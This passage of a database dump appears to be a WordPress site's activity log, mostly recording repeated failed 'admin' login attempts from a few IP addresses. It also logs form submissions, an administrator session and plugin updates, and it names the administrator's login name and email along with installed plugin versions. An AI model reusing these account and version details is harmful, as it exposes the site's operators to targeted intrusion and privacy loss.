Safari/537.36'),(223016,37164,'_message_key','user_unknown_login_failed'),(223017,37164,'_server_remote_addr','35.187.58.x'),(223018,37165,'failed_username','admin'),(223019,37165,'server_http_user_agent','Mozilla/5.0'),(223020,37165,'_message_key','user_unknown_login_failed'),(223021,37165,'_server_remote_addr','45.136.118.x'),(223022,37166,'failed_username','admin'),(223023,37166,'server_http_user_agent','Mozilla/5.0'),(223024,37166,'_message_key','user_unknown_login_failed'),(223025,37166,'_server_remote_addr','20.150.218.x'),(223026,37167,'failed_username','admin'),(223027,37167,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'),(223028,37167,'_message_key','user_unknown_login_failed'),(223029,37167,'_server_remote_addr','54.36.173.x'),(223030,37168,'failed_username','admin'),(223031,37168,'server_http_user_agent','Mozilla/5.0'),(223032,37168,'_message_key','user_unknown_login_failed'),(223033,37168,'_server_remote_addr','45.136.118.x'),(223034,37169,'failed_username','admin'),(223035,37169,'server_http_user_agent','Mozilla/5.0'),(223036,37169,'_message_key','user_unknown_login_failed'),(223037,37169,'_server_remote_addr','20.150.218.x'),(223038,37170,'failed_username','admin'),(223039,37170,'server_http_user_agent','Mozilla/5.0'),(223040,37170,'_message_key','user_unknown_login_failed'),(223041,37170,'_server_remote_addr','45.136.118.x'),(223042,37171,'failed_username','admin'),(223043,37171,'server_http_user_agent','Mozilla/5.0'),(223044,37171,'_message_key','user_unknown_login_failed'),(223045,37171,'_server_remote_addr','20.150.218.x'),(223046,37172,'failed_username','admin'),(223047,37172,'server_http_user_agent','Mozilla/5.0'),(223048,37172,'_message_key','user_unknown_login_failed'),(223049,37172,'_server_remote_addr','45.136.118.x'),(223050,37173,'failed_username','admin'),(223051,37173,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'),(223052,37173,'_message_key','user_unknown_login_failed'),(223053,37173,'_server_remote_addr','67.205.12.x'),(223054,37174,'failed_username','admin'),(223055,37174,'server_http_user_agent','Mozilla/5.0'),(223056,37174,'_message_key','user_unknown_login_failed'),(223057,37174,'_server_remote_addr','20.150.218.x'),(223058,37175,'failed_username','admin'),(223059,37175,'server_http_user_agent','Mozilla/5.0'),(223060,37175,'_message_key','user_unknown_login_failed'),(223061,37175,'_server_remote_addr','45.136.118.x'),(223062,37176,'failed_username','admin'),(223063,37176,'server_http_user_agent','Mozilla/5.0'),(223064,37176,'_message_key','user_unknown_login_failed'),(223065,37176,'_server_remote_addr','20.150.218.x'),(223066,37177,'failed_username','admin'),(223067,37177,'server_http_user_agent','Mozilla/5.0'),(223068,37177,'_message_key','user_unknown_login_failed'),(223069,37177,'_server_remote_addr','45.136.118.x'),(223070,37178,'failed_username','admin'),(223071,37178,'server_http_user_agent','Mozilla/5.0'),(223072,37178,'_message_key','user_unknown_login_failed'),(223073,37178,'_server_remote_addr','20.150.218.x'),(223074,37179,'failed_username','admin'),(223075,37179,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36'),(223076,37179,'_message_key','user_unknown_login_failed'),(223077,37179,'_server_remote_addr','47.97.195.x'),(223078,37180,'failed_username','admin'),(223079,37180,'server_http_user_agent','Mozilla/5.0'),(223080,37180,'_message_key','user_unknown_login_failed'),(223081,37180,'_server_remote_addr','45.136.118.x'),(223082,37181,'failed_username','admin'),(223083,37181,'server_http_user_agent','Mozilla/5.0'),(223084,37181,'_message_key','user_unknown_login_failed'),(223085,37181,'_server_remote_addr','20.150.218.x'),(223086,37182,'failed_username','admin'),(223087,37182,'server_http_user_agent','Mozilla/5.0'),(223088,37182,'_message_key','user_unknown_login_failed'),(223089,37182,'_server_remote_addr','45.136.118.x'),(223090,37183,'failed_username','gowski'),(223091,37183,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(223092,37183,'_message_key','user_unknown_login_failed'),(223093,37183,'_xmlrpc_request','true'),(223094,37183,'_server_remote_addr','20.119.184.x'),(223095,37184,'failed_username','admin'),(223096,37184,'server_http_user_agent','Mozilla/5.0'),(223097,37184,'_message_key','user_unknown_login_failed'),(223098,37184,'_server_remote_addr','20.150.218.x'),(223099,37185,'failed_username','admin'),(223100,37185,'server_http_user_agent','Mozilla/5.0'),(223101,37185,'_message_key','user_unknown_login_failed'),(223102,37185,'_server_remote_addr','45.136.118.x'),(223103,37186,'failed_username','admin'),(223104,37186,'server_http_user_agent','Mozilla/5.0'),(223105,37186,'_message_key','user_unknown_login_failed'),(223106,37186,'_server_remote_addr','20.150.218.x'),(223107,37187,'failed_username','admin'),(223108,37187,'server_http_user_agent','Mozilla/5.0'),(223109,37187,'_message_key','user_unknown_login_failed'),(223110,37187,'_server_remote_addr','45.136.118.x'),(223111,37188,'failed_username','admin'),(223112,37188,'server_http_user_agent','Mozilla/5.0'),(223113,37188,'_message_key','user_unknown_login_failed'),(223114,37188,'_server_remote_addr','20.150.218.x'),(223115,37189,'failed_username','admin'),(223116,37189,'server_http_user_agent','Mozilla/5.0'),(223117,37189,'_message_key','user_unknown_login_failed'),(223118,37189,'_server_remote_addr','45.136.118.x'),(223119,37190,'failed_username','admin'),(223120,37190,'server_http_user_agent','Mozilla/5.0'),(223121,37190,'_message_key','user_unknown_login_failed'),(223122,37190,'_server_remote_addr','20.150.218.x'),(223123,37191,'failed_username','admin'),(223124,37191,'server_http_user_agent','Mozilla/5.0'),(223125,37191,'_message_key','user_unknown_login_failed'),(223126,37191,'_server_remote_addr','45.136.118.x'),(223127,37192,'failed_username','admin'),(223128,37192,'server_http_user_agent','Mozilla/5.0'),(223129,37192,'_message_key','user_unknown_login_failed'),(223130,37192,'_server_remote_addr','20.150.218.x'),(223131,37193,'failed_username','admin'),(223132,37193,'server_http_user_agent','Mozilla/5.0'),(223133,37193,'_message_key','user_unknown_login_failed'),(223134,37193,'_server_remote_addr','45.136.118.x'),(223135,37194,'failed_username','admin'),(223136,37194,'server_http_user_agent','Mozilla/5.0'),(223137,37194,'_message_key','user_unknown_login_failed'),(223138,37194,'_server_remote_addr','20.150.218.x'),(223139,37195,'failed_username','admin'),(223140,37195,'server_http_user_agent','Mozilla/5.0'),(223141,37195,'_message_key','user_unknown_login_failed'),(223142,37195,'_server_remote_addr','45.136.118.x'),(223143,37196,'failed_username','admin'),(223144,37196,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36'),(223145,37196,'_message_key','user_unknown_login_failed'),(223146,37196,'_server_remote_addr','178.63.77.x'),(223147,37197,'failed_username','admin'),(223148,37197,'server_http_user_agent','Mozilla/5.0'),(223149,37197,'_message_key','user_unknown_login_failed'),(223150,37197,'_server_remote_addr','20.150.218.x'),(223151,37198,'failed_username','admin'),(223152,37198,'server_http_user_agent','Mozilla/5.0'),(223153,37198,'_message_key','user_unknown_login_failed'),(223154,37198,'_server_remote_addr','45.136.118.x'),(223155,37199,'failed_username','admin'),(223156,37199,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(223157,37199,'_message_key','user_unknown_login_failed'),(223158,37199,'_server_remote_addr','37.187.135.x'),(223159,37200,'failed_username','admin'),(223160,37200,'server_http_user_agent','Mozilla/5.0'),(223161,37200,'_message_key','user_unknown_login_failed'),(223162,37200,'_server_remote_addr','20.150.218.x'),(223163,37201,'failed_username','admin'),(223164,37201,'server_http_user_agent','Mozilla/5.0'),(223165,37201,'_message_key','user_unknown_login_failed'),(223166,37201,'_server_remote_addr','45.136.118.x'),(223167,37202,'failed_username','admin'),(223168,37202,'server_http_user_agent','Mozilla/5.0'),(223169,37202,'_message_key','user_unknown_login_failed'),(223170,37202,'_server_remote_addr','20.150.218.x'),(223171,37203,'failed_username','admin'),(223172,37203,'server_http_user_agent','Mozilla/5.0'),(223173,37203,'_message_key','user_unknown_login_failed'),(223174,37203,'_server_remote_addr','45.136.118.x'),(223175,37204,'failed_username','admin'),(223176,37204,'server_http_user_agent','Mozilla/5.0'),(223177,37204,'_message_key','user_unknown_login_failed'),(223178,37204,'_server_remote_addr','20.150.218.x'),(223179,37205,'failed_username','admin'),(223180,37205,'server_http_user_agent','Mozilla/5.0'),(223181,37205,'_message_key','user_unknown_login_failed'),(223182,37205,'_server_remote_addr','45.136.118.x'),(223183,37206,'failed_username','admin'),(223184,37206,'server_http_user_agent','Mozilla/5.0'),(223185,37206,'_message_key','user_unknown_login_failed'),(223186,37206,'_server_remote_addr','45.136.118.x'),(223187,37207,'failed_username','admin'),(223188,37207,'server_http_user_agent','Mozilla/5.0'),(223189,37207,'_message_key','user_unknown_login_failed'),(223190,37207,'_server_remote_addr','20.150.218.x'),(223191,37208,'failed_username','admin'),(223192,37208,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),(223193,37208,'_message_key','user_unknown_login_failed'),(223194,37208,'_server_remote_addr','181.39.113.x'),(223195,37209,'failed_username','admin'),(223196,37209,'server_http_user_agent','Mozilla/5.0'),(223197,37209,'_message_key','user_unknown_login_failed'),(223198,37209,'_server_remote_addr','45.136.118.x'),(223199,37210,'failed_username','admin'),(223200,37210,'server_http_user_agent','Mozilla/5.0'),(223201,37210,'_message_key','user_unknown_login_failed'),(223202,37210,'_server_remote_addr','20.150.218.x'),(223203,37211,'failed_username','admin'),(223204,37211,'server_http_user_agent','Mozilla/5.0'),(223205,37211,'_message_key','user_unknown_login_failed'),(223206,37211,'_server_remote_addr','45.136.118.x'),(223207,37212,'failed_username','admin'),(223208,37212,'server_http_user_agent','Mozilla/5.0'),(223209,37212,'_message_key','user_unknown_login_failed'),(223210,37212,'_server_remote_addr','20.150.218.x'),(223211,37213,'failed_username','admin'),(223212,37213,'server_http_user_agent','Mozilla/5.0'),(223213,37213,'_message_key','user_unknown_login_failed'),(223214,37213,'_server_remote_addr','45.136.118.x'),(223215,37214,'failed_username','admin'),(223216,37214,'server_http_user_agent','Mozilla/5.0'),(223217,37214,'_message_key','user_unknown_login_failed'),(223218,37214,'_server_remote_addr','20.150.218.x'),(223219,37215,'failed_username','admin'),(223220,37215,'server_http_user_agent','Mozilla/5.0'),(223221,37215,'_message_key','user_unknown_login_failed'),(223222,37215,'_server_remote_addr','45.136.118.x'),(223223,37216,'failed_username','admin'),(223224,37216,'server_http_user_agent','Mozilla/5.0'),(223225,37216,'_message_key','user_unknown_login_failed'),(223226,37216,'_server_remote_addr','20.150.218.x'),(223227,37217,'failed_username','admin'),(223228,37217,'server_http_user_agent','Mozilla/5.0'),(223229,37217,'_message_key','user_unknown_login_failed'),(223230,37217,'_server_remote_addr','45.136.118.x'),(223231,37218,'failed_username','admin'),(223232,37218,'server_http_user_agent','Mozilla/5.0'),(223233,37218,'_message_key','user_unknown_login_failed'),(223234,37218,'_server_remote_addr','20.150.218.x'),(223235,37219,'failed_username','admin'),(223236,37219,'server_http_user_agent','Mozilla/5.0'),(223237,37219,'_message_key','user_unknown_login_failed'),(223238,37219,'_server_remote_addr','45.136.118.x'),(223239,37220,'failed_username','admin'),(223240,37220,'server_http_user_agent','Mozilla/5.0'),(223241,37220,'_message_key','user_unknown_login_failed'),(223242,37220,'_server_remote_addr','20.150.218.x'),(223243,37221,'failed_username','admin'),(223244,37221,'server_http_user_agent','Mozilla/5.0'),(223245,37221,'_message_key','user_unknown_login_failed'),(223246,37221,'_server_remote_addr','45.136.118.x'),(223247,37222,'failed_username','admin'),(223248,37222,'server_http_user_agent','Mozilla/5.0'),(223249,37222,'_message_key','user_unknown_login_failed'),(223250,37222,'_server_remote_addr','20.150.218.x'),(223251,37223,'failed_username','admin'),(223252,37223,'server_http_user_agent','Mozilla/5.0'),(223253,37223,'_message_key','user_unknown_login_failed'),(223254,37223,'_server_remote_addr','45.136.118.x'),(223255,37224,'failed_username','admin'),(223256,37224,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36'),(223257,37224,'_message_key','user_unknown_login_failed'),(223258,37224,'_server_remote_addr','69.43.139.x'),(223259,37225,'failed_username','admin'),(223260,37225,'server_http_user_agent','Mozilla/5.0'),(223261,37225,'_message_key','user_unknown_login_failed'),(223262,37225,'_server_remote_addr','20.150.218.x'),(223263,37226,'failed_username','admin'),(223264,37226,'server_http_user_agent','Mozilla/5.0'),(223265,37226,'_message_key','user_unknown_login_failed'),(223266,37226,'_server_remote_addr','45.136.118.x'),(223267,37227,'failed_username','admin'),(223268,37227,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36'),(223269,37227,'_message_key','user_unknown_login_failed'),(223270,37227,'_server_remote_addr','103.176.78.x'),(223271,37228,'failed_username','admin'),(223272,37228,'server_http_user_agent','Mozilla/5.0'),(223273,37228,'_message_key','user_unknown_login_failed'),(223274,37228,'_server_remote_addr','20.150.218.x'),(223275,37229,'failed_username','admin'),(223276,37229,'server_http_user_agent','Mozilla/5.0'),(223277,37229,'_message_key','user_unknown_login_failed'),(223278,37229,'_server_remote_addr','45.136.118.x'),(223279,37230,'failed_username','admin'),(223280,37230,'server_http_user_agent','Mozilla/5.0'),(223281,37230,'_message_key','user_unknown_login_failed'),(223282,37230,'_server_remote_addr','20.150.218.x'),(223283,37231,'failed_username','admin'),(223284,37231,'server_http_user_agent','Mozilla/5.0'),(223285,37231,'_message_key','user_unknown_login_failed'),(223286,37231,'_server_remote_addr','45.136.118.x'),(223287,37232,'failed_username','admin'),(223288,37232,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36'),(223289,37232,'_message_key','user_unknown_login_failed'),(223290,37232,'_server_remote_addr','162.240.104.x'),(223291,37233,'failed_username','admin'),(223292,37233,'server_http_user_agent','Mozilla/5.0'),(223293,37233,'_message_key','user_unknown_login_failed'),(223294,37233,'_server_remote_addr','20.150.218.x'),(223295,37234,'failed_username','admin'),(223296,37234,'server_http_user_agent','Mozilla/5.0'),(223297,37234,'_message_key','user_unknown_login_failed'),(223298,37234,'_server_remote_addr','45.136.118.x'),(223299,37235,'post_id','269197'),(223300,37235,'post_type','nf_sub'),(223301,37235,'post_title',''),(223302,37235,'_message_key','post_updated'),(223303,37235,'_server_remote_addr','172.59.230.x'),(223304,37235,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/'),(223305,37236,'failed_username','admin'),(223306,37236,'server_http_user_agent','Mozilla/5.0'),(223307,37236,'_message_key','user_unknown_login_failed'),(223308,37236,'_server_remote_addr','45.136.118.x'),(223309,37237,'failed_username','admin'),(223310,37237,'server_http_user_agent','Mozilla/5.0'),(223311,37237,'_message_key','user_unknown_login_failed'),(223312,37237,'_server_remote_addr','20.150.218.x'),(223313,37238,'failed_username','admin'),(223314,37238,'server_http_user_agent','Mozilla/5.0'),(223315,37238,'_message_key','user_unknown_login_failed'),(223316,37238,'_server_remote_addr','45.136.118.x'),(223317,37239,'failed_username','admin'),(223318,37239,'server_http_user_agent','Mozilla/5.0'),(223319,37239,'_message_key','user_unknown_login_failed'),(223320,37239,'_server_remote_addr','20.150.218.x'),(223321,37240,'post_id','269198'),(223322,37240,'post_type','nf_sub'),(223323,37240,'post_title',''),(223324,37240,'_message_key','post_updated'),(223325,37240,'_server_remote_addr','8.44.153.x'),(223326,37240,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/'),(223327,37241,'post_id','269199'),(223328,37241,'post_type','nf_sub'),(223329,37241,'post_title',''),(223330,37241,'_message_key','post_updated'),(223331,37241,'_server_remote_addr','185.238.231.x'),(223332,37241,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/'),(223333,37242,'failed_username','admin'),(223334,37242,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36'),(223335,37242,'_message_key','user_unknown_login_failed'),(223336,37242,'_server_remote_addr','150.109.148.x'),(223337,37243,'post_id','269200'),(223338,37243,'post_type','nf_sub'),(223339,37243,'post_title',''),(223340,37243,'_message_key','post_updated'),(223341,37243,'_server_remote_addr','71.205.132.x'),(223342,37243,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/'),(223343,37244,'failed_username','admin'),(223344,37244,'server_http_user_agent','Mozilla/5.0'),(223345,37244,'_message_key','user_unknown_login_failed'),(223346,37244,'_server_remote_addr','45.136.118.x'),(223347,37245,'failed_username','admin'),(223348,37245,'server_http_user_agent','Mozilla/5.0'),(223349,37245,'_message_key','user_unknown_login_failed'),(223350,37245,'_server_remote_addr','20.150.218.x'),(223351,37246,'failed_username','admin'),(223352,37246,'server_http_user_agent','Mozilla/5.0'),(223353,37246,'_message_key','user_unknown_login_failed'),(223354,37246,'_server_remote_addr','45.136.118.x'),(223355,37247,'failed_username','admin'),(223356,37247,'server_http_user_agent','Mozilla/5.0'),(223357,37247,'_message_key','user_unknown_login_failed'),(223358,37247,'_server_remote_addr','20.150.218.x'),(223359,37248,'failed_username','admin'),(223360,37248,'server_http_user_agent','Mozilla/5.0'),(223361,37248,'_message_key','user_unknown_login_failed'),(223362,37248,'_server_remote_addr','45.136.118.x'),(223363,37249,'failed_username','admin'),(223364,37249,'server_http_user_agent','Mozilla/5.0'),(223365,37249,'_message_key','user_unknown_login_failed'),(223366,37249,'_server_remote_addr','20.150.218.x'),(223367,37250,'failed_username','admin'),(223368,37250,'server_http_user_agent','Mozilla/5.0'),(223369,37250,'_message_key','user_unknown_login_failed'),(223370,37250,'_server_remote_addr','45.136.118.x'),(223371,37251,'failed_username','admin'),(223372,37251,'server_http_user_agent','Mozilla/5.0'),(223373,37251,'_message_key','user_unknown_login_failed'),(223374,37251,'_server_remote_addr','20.150.218.x'),(223375,37252,'failed_username','admin'),(223376,37252,'server_http_user_agent','Mozilla/5.0'),(223377,37252,'_message_key','user_unknown_login_failed'),(223378,37252,'_server_remote_addr','45.136.118.x'),(223379,37253,'failed_username','admin'),(223380,37253,'server_http_user_agent','Mozilla/5.0'),(223381,37253,'_message_key','user_unknown_login_failed'),(223382,37253,'_server_remote_addr','20.150.218.x'),(223383,37254,'failed_username','admin'),(223384,37254,'server_http_user_agent','Mozilla/5.0'),(223385,37254,'_message_key','user_unknown_login_failed'),(223386,37254,'_server_remote_addr','45.136.118.x'),(223387,37255,'user_id','2'),(223388,37255,'user_email','nada@zipnadanot.org'),(223389,37255,'user_login','S8zhaBda'),(223390,37255,'_user_id','2'),(223391,37255,'_user_login','S8zhaBda'),(223392,37255,'_user_email','nada@zipnadanot.org'),(223393,37255,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0'),(223394,37255,'_message_key','user_logged_in'),(223395,37255,'_server_remote_addr','76.130.120.x'),(223396,37255,'_server_http_referer','https://eckankar-colorado.org/wp-login.php?redirect_to=https%3A%2F%2Fwww.eckankar-colorado.org%2Fwp-admin%2F&reauth=1'),(223397,37256,'failed_username','admin'),(223398,37256,'server_http_user_agent','Mozilla/5.0'),(223399,37256,'_message_key','user_unknown_login_failed'),(223400,37256,'_server_remote_addr','20.150.218.x'),(223401,37257,'plugin_slug','wp-staging'),(223402,37257,'plugin_name','Backup Duplicator &amp; Migration - WP STAGING'),(223403,37257,'plugin_title','<a href=\"https://wordpress.org/plugins/wp-staging\">Backup Duplicator &amp; Migration - WP STAGING</a>'),(223404,37257,'plugin_description','Backup Restore <cite>By <a href=\"https://wp-staging.com/backup-wordpress\">WP-STAGING, WPStagingBackup</a>.</cite>'),(223405,37257,'plugin_author','<a href=\"https://wp-staging.com/backup-wordpress\">WP-STAGING, WPStagingBackup</a>'),(223406,37257,'plugin_version','3.0.6'),(223407,37257,'plugin_url','https://wordpress.org/plugins/wp-staging'),(223408,37257,'plugin_prev_version','3.0.4'),(223409,37257,'_message_key','plugin_bulk_updated'),(223410,37257,'_user_id','2'),(223411,37257,'_user_login','S8zhaBda'),(223412,37257,'_user_email','nada@zipnadanot.org'),(223413,37257,'_server_remote_addr','76.130.120.x'),(223414,37257,'_server_http_referer','https://eckankar-colorado.org/wp-admin/plugins.php'),(223415,37258,'plugin_slug','ninja-forms'),(223416,37258,'plugin_name','Ninja Forms'),(223417,37258,'plugin_title','<a href=\"http://ninjaforms.com/?utm_source=Ninja+Forms+Plugin&#038;utm_medium=readme\">Ninja Forms</a>'),(223418,37258,'plugin_description','Ninja Forms is a webform builder with unparalleled ease of use and features. <cite>By <a href=\"http://ninjaforms.com/?utm_source=Ninja+Forms+Plugin&#038;utm_medium=Plugins+WP+Dashboard\">Saturday Drive</a>.</cite>'),(223419,37258,'plugin_author','<a href=\"http://ninjaforms.com/?utm_source=Ninja+Forms+Plugin&#038;utm_medium=Plugins+WP+Dashboard\">Saturday Drive</a>'),(223420,37258,'plugin_version','3.6.34'),(223421,37258,'plugin_url','http://ninjaforms.com/?utm_source=Ninja+Forms+Plugin&#038;utm_medium=readme'),(223422,37258,'plugin_prev_version','3.6.32'),(223423,37258,'_message_key','plugin_bulk_updated'),(223424,37258,'_user_id','2'),(223425,37258,'_user_login','S8zhaBda'),(223426,37258,'_user_email','nada@zipnadanot.org'),(223427,37258,'_server_remote_addr','76.130.120.x'),(223428,37258,'_server_http_referer','https://eckankar-colorado.org/wp-admin/plugins.php'),(223429,37259,'failed_username','admin'),(223430,37259,'server_http_user_agent','Mozilla/5.0'),(223431,37259,'_message_key','user_unknown_login_failed'),(223432,37259,'_server_remote_addr','45.136.118.x'),(223433,37260,'plugin_slug','really-simple-ssl'),(223434,37260,'plugin_name','Really Simple SSL'),(223435,37260,'plugin_title','<a href=\"https://really-simple-ssl.com\">Really Simple SSL</a>'),(223436,37260,'plugin_description','Lightweight SSL &amp; Hardening Plugin <cite>By <a href=\"https://really-simple-plugins.com\">Really Simple Plugins</a>.</cite>'),(223437,37260,'plugin_author','<a href=\"https://really-simple-plugins.com\">Really Simple Plugins</a>'),(223438,37260,'plugin_version','7.1.3'),(223439,37260,'plugin_url','https://really-simple-ssl.com'),(223440,37260,'plugin_prev_version','7.0.9'),(223441,37260,'_message_key','plugin_bulk_updated'),(223442,37260,'_user_id','2'),(223443,37260,'_user_login','S8zhaBda'),(223444,37260,'_user_email','nada@zipnadanot.org'),(223445,37260,'_server_remote_addr','76.130.120.x'),(223446,37260,'_server_http_referer','https://eckankar-colorado.org/wp-admin/plugins.php'),(223447,37261,'plugin_slug','responsive-accordion-and-collapse'),(223448,37261,'plugin_name','Responsive Accordion And Collapse'),(223449,37261,'plugin_title','<a href=\"https://www.wpshopmart.com/plugins/\">Responsive Accordion And Collapse</a>'),(223450,37261,'plugin_description','Responsive Accordion is the most easiest drag &amp; drop accordion builder for WordPress. You can generate multiple accordion and collapse with multiple colour. <cite>By <a href=\"https://www.wpshopmart.com\">wpshopmart</a>.</cite>'),(223451,37261,'plugin_author','<a href=\"https://www.wpshopmart.com\">wpshopmart</a>'),(223452,37261,'plugin_version','2.4.5'),(223453,37261,'plugin_url','https://www.wpshopmart.com/plugins/'),(223454,37261,'plugin_prev_version','2.4.4'),(223455,37261,'_message_key','plugin_bulk_updated'),(223456,37261,'_user_id','2'),(223457,37261,'_user_login','S8zhaBda'),(223458,37261,'_user_email','nada@zipnadanot.org'),(223459,37261,'_server_remote_addr','76.130.120.x'),(223460,37261,'_server_http_referer','https://eckankar-colorado.org/wp-admin/plugins.php'),(223461,37262,'plugin_slug','simple-history'),(223462,37262,'plugin_name','Simple History'),(223463,37262,'plugin_title','<a href=\"https://simple-history.com\">Simple History</a>'),(223464,37262,'plugin_description','Plugin that logs various things that occur in WordPress and then presents those events in a very nice GUI. <cite>By <a href=\"https://simple-history.com/\">Pär Thernström</a>.</cite>'),(223465,37262,'plugin_author','<a href=\"https://simple-history.com/\">Pär Thernström</a>'),(223466,37262,'plugin_version','4.7.0'),(223467,37262,'plugin_url','https://simple-history.com'),(223468,37262,'plugin_prev_version','4.6.0'),(223469,37262,'_message_key','plugin_bulk_updated'),(223470,37262,'_user_id','2'),(223471,37262,'_user_login','S8zhaBda'),(223472,37262,'_user_email','nada@zipnadanot.org'),(223473,37262,'_server_remote_addr','76.130.120.x'),(223474,37262,'_server_http_referer','https://eckankar-colorado.org/wp-admin/plugins.php'),(223475,37263,'plugin_slug','404page'),(223476,37263,'plugin_name','Smart Custom 404 error page [404page]'),(223477,37263,'plugin_title','Smart Custom 404 error page [404page]'),(223478,37263,'plugin_description','Custom 404 the easy way! Set any page as custom 404 error page. No coding needed. Works with (almost) every Theme. <cite>By <a href=\"https://profiles.wordpress.org/petersplugins/\">Peter Raschendorfer</a>.</cite>'),(223479,37263,'plugin_author','<a href=\"https://profiles.wordpress.org/petersplugins/\">Peter Raschendorfer</a>'),(223480,37263,'plugin_version','11.4.4'),(223481,37263,'plugin_url',''),(223482,37263,'plugin_prev_version','11.4.3'),(223483,37263,'_message_key','plugin_bulk_updated'),(223484,37263,'_user_id','2'),(223485,37263,'_user_login','S8zhaBda'),(223486,37263,'_user_email','nada@zipnadanot.org'),(223487,37263,'_server_remote_addr','76.130.120.x'),(223488,37263,'_server_http_referer','https://eckankar-colorado.org/wp-admin/plugins.php'),(223489,37264,'failed_username','admin'),(223490,37264,'server_http_user_agent','Mozilla/5.0'),(223491,37264,'_message_key','user_unknown_login_failed'),(223492,37264,'_server_remote_addr','20.150.218.x'),(223493,37265,'failed_username','admin'),(223494,37265,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36'),(223495,37265,'_message_key','user_unknown_login_failed'),(223496,37265,'_server_remote_addr','181.43.99.x'),(223497,37266,'failed_username','admin'),(223498,37266,'server_http_user_agent','Mozilla/5.0'),(223499,37266,'_message_key','user_unknown_login_failed'),(223500,37266,'_server_remote_addr','45.136.118.x'),(223501,37267,'failed_username','admin'),(223502,37267,'server_http_user_agent','Mozilla/5.0'),(223503,37267,'_message_key','user_unknown_login_failed'),(223504,37267,'_server_remote_addr','20.150.218.x'),(223505,37268,'failed_username','admin'),(223506,37268,'server_http_user_agent','Mozilla/5.0'),(223507,37268,'_message_key','user_unknown_login_failed'),(223508,37268,'_server_remote_addr','45.136.118.x'),(223509,37269,'failed_username','admin'),(223510,37269,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36'),(223511,37269,'_message_key','user_unknown_login_failed'),(223512,37269,'_server_remote_addr','178.32.114.x'),(223513,37270,'_user_id','2'),(223514,37270,'_user_login','S8zhaBda'),(223515,37270,'_user_email','nada@zipnadanot.org'),(223516,37270,'_message_key','user_logged_out'),(223517,37270,'_server_remote_addr','76.130.120.x'),(223518,37270,'_server_http_referer','https://eckankar-colorado.org/wp-admin/admin.php?page=WordfenceScan'),(223519,37271,'failed_username','admin'),(223520,37271,'server_http_user_agent','Mozilla/5.0'),(223521,37271,'_message_key','user_unknown_login_failed'),(223522,37271,'_server_remote_addr','20.150.218.x'),(223523,37272,'failed_username','admin'),(223524,37272,'server_http_user_agent','Mozilla/5.0'),(223525,37272,'_message_key','user_unknown_login_failed'),(223526,37272,'_server_remote_addr','45.136.118.x'),(223527,37273,'failed_username','admin'),(223528,37273,'server_http_user_agent','Mozilla/5.0'),(223529,37273,'_message_key','user_unknown_login_failed'),(223530,37273,'_server_remote_addr','20.150.218.x'),(223531,37274,'failed_username','admin'),(223532,37274,'server_http_user_agent','Mozilla/5.0'),(223533,37274,'_message_key','user_unknown_login_failed'),(223534,37274,'_server_remote_addr','45.136.118.x'),(223535,37275,'failed_username','admin'),(223536,37275,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'),(223537,37275,'_message_key','user_unknown_login_failed'),(223538,37275,'_server_remote_addr','52.140.17.x'),(223539,37276,'failed_username','admin'),(223540,37276,'server_http_user_agent','Mozilla/5.0'),(223541,37276,'_message_key','user_unknown_login_failed'),(223542,37276,'_server_remote_addr','45.136.118.x'),(223543,37277,'failed_username','admin'),(223544,37277,'server_http_user_agent','Mozilla/5.0'),(223545,37277,'_message_key','user_unknown_login_failed'),(223546,37277,'_server_remote_addr','20.150.218.x'),(223547,37278,'failed_username','admin'),(223548,37278,'server_http_user_agent','Mozilla/5.0'),(223549,37278,'_message_key','user_unknown_login_failed'),(223550,37278,'_server_remote_addr','45.136.118.x'),(223551,37279,'failed_username','admin'),(223552,37279,'server_http_user_agent','Mozilla/5.0'),(223553,37279,'_message_key','user_unknown_login_failed'),(223554,37279,'_server_remote_addr','20.150.218.x'),(223555,37280,'failed_username','admin'),(223556,37280,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 